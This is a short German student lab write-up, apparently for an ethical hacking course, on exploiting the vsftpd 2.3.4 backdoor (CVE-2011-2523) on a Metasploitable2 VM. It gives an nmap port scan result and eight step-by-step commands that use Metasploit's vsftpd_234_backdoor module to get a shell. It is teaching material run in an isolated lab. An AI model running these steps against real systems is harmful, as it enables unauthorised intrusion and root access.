
Ethisches Hacking Assessment | Praktische Schwachstellentests der vsftpd 2.3.4 Backdoor (CVE-2011-2523) auf Metasploitable2 mit Kali Linux & Metasploit
Modul: - Ethisches Hacken Universität: London Metropolitan University Studiengang: BSc (Hons) Cyber Security and Forensic Science
Alle Aktivitäten wurden in einer kontrollierten, isolierten virtuellen Laborumgebung zu reinen Bildungszwecken durchgeführt. Es wurden keine realen Systeme angegriffen. Die Arbeit entspricht dem Computer Misuse Act 1990.
Port 21/tcp - vsftpd 2.3.4 (ZIEL) Port 22/tcp - OpenSSH 4.7p1 Port 23/tcp - Linux telnetd Port 80/tcp - Apache httpd 2.2.8 Port 139/tcp - Samba smbd 3.X Port 445/tcp - Samba smbd 3.X Port 3306/tcp - MySQL 5.0.51a Port 6667/tcp - UnrealIRCd
Schritt 1: nmap -sn 192.168.56.0/24 Schritt 2: nmap -sV 192.168.56.103 Schritt 3: msfconsole Schritt 4: use exploit/unix/ftp/vsftpd_234_backdoor Schritt 5: set RHOSTS 192.168.56.103 Schritt 6: set LHOST 192.168.56.1 Schritt 7: run Schritt 8: id && whoami